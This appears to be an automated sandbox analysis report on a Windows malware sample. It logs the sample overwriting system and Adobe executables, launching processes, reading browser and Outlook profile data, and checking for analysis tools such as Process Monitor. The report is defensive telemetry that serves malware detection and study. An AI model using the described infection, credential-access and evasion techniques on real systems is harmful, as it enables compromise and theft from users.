                Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: 1SxKeB4u0c.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@9/7@17/10
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046A06A GetLastError,FormatMessageW,0_2_0046A06A
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,0_2_004581CB
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004587E1
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B333
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047EE0D
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C397
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404E89
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F3CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_02F3CBD0
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile created: C:\Users\user\AppData\Roaming\7d5db47b92cfd441.binJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7d5db47b92cfd441-inf
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7d5db47b92cfd4413d78ffaf-b
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile created: C:\Users\user\AppData\Local\Temp\aut8CEA.tmpJump to behavior
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: bitsadmin.exe, 00000007.00000003.1868711182.0000000003475000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3894745583.0000000003475000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.1868457679.0000000003454000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3894745583.00000000034A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 1SxKeB4u0c.exeReversingLabs: Detection: 86%
                Source: 1SxKeB4u0c.exeVirustotal: Detection: 83%
                Source: unknownProcess created: C:\Users\user\Desktop\1SxKeB4u0c.exe "C:\Users\user\Desktop\1SxKeB4u0c.exe"
                Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1SxKeB4u0c.exe"
                Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1SxKeB4u0c.exe"Jump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 1SxKeB4u0c.exeStatic file information: File size 1794048 > 1048576
                Source: 1SxKeB4u0c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: 1SxKeB4u0c.exe, 00000000.00000003.1432232486.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
                Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
                Source: Binary string: ALG.pdbGCTL source: 1SxKeB4u0c.exe, 00000000.00000003.1437010006.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000003.00000003.1647360528.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1647240452.000000000081A000.00000004.00000020.00020000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000002.3895903417.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000003.00000003.1647360528.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1647240452.000000000081A000.00000004.00000020.00020000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000002.3895903417.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LbtMpScwNRqrVB.exe, 00000006.00000002.3894269356.000000000013E000.00000002.00000001.01000000.00000005.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000000.1750220082.000000000013E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 1SxKeB4u0c.exe, 00000000.00000003.1452279000.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000003.1441801356.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1682889494.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1682889494.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1586104823.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1583925733.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.1684871418.00000000037BB000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003B0E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.1682483471.000000000360E000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003970000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 1SxKeB4u0c.exe, 00000000.00000003.1452279000.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000003.1441801356.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.1682889494.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1682889494.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1586104823.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1583925733.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, bitsadmin.exe, 00000007.00000003.1684871418.00000000037BB000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003B0E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.1682483471.000000000360E000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003970000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdb source: 1SxKeB4u0c.exe, 00000000.00000003.1437010006.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: alg.exe.0.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
                Source: armsvc.exe.0.drStatic PE information: section name: .didat
                Source: alg.exe.0.drStatic PE information: section name: .didat
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00428945 push ecx; ret 0_2_00428958
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00402F12 push es; retf 0_2_00402F13
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F1520C push 02F1528Fh; ret 0_2_02F1522D
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F1B180 push 02F1B0CAh; ret 0_2_02F1B061
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F1B180 push 02F1B30Dh; ret 0_2_02F1B1E6
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F1B180 push 02F1B2F2h; ret 0_2_02F1B262
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F1B180 push 02F1B255h; ret 0_2_02F1B2ED
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F1B180 push 02F1B2D0h; ret 0_2_02F1B346
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F1B180 push 02F1B37Fh; ret 0_2_02F1B3B7
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F3852Eh; ret 0_2_02F37F3A
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38514h; ret 0_2_02F37F66
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F37E66h; ret 0_2_02F38057
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F3817Ah; ret 0_2_02F3808B
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F382E5h; ret 0_2_02F380D9
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F3826Ah; ret 0_2_02F3819E
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F3849Ch; ret 0_2_02F381E4
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38321h; ret 0_2_02F382E0
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F37FBFh; ret 0_2_02F3831F
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F37FA8h; ret 0_2_02F3834C
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F384BAh; ret 0_2_02F383E2
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38426h; ret 0_2_02F384D8
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38075h; ret 0_2_02F384FD
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F3808Ch; ret 0_2_02F38512
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38D45h; ret 0_2_02F387D3
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38AB5h; ret 0_2_02F38B13
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38784h; ret 0_2_02F38CA1
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38DC9h; ret 0_2_02F38E1C
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38D14h; ret 0_2_02F38E2E
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38674h; ret 0_2_02F38E4D
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F388A6h; ret 0_2_02F38F76
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F3868Ch; ret 0_2_02F38FA4
                Source: 1SxKeB4u0c.exeStatic PE information: section name: .reloc entropy: 7.938061157054464
                Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.9430060247567535

                Persistence and Installation Behavior

                barindex
                Drops executable to a common third party application directory
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Infects executable files (exe, dll, sys, html)
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F3CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_02F3CBD0
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeAPI/Special instruction interceptor: Address: A8B58C
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: 1SxKeB4u0c.exe, 00000000.00000003.1430895740.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000003.1431048103.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000002.1454691196.0000000000B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD096E rdtsc 3_2_02FD096E
                Source: C:\Windows\SysWOW64\bitsadmin.exeWindow / User API: threadDelayed 1467Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeWindow / User API: threadDelayed 8507Jump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeDropped PE file which has not been started: C:\Windows\System32\AppVClient.exeJump to dropped file
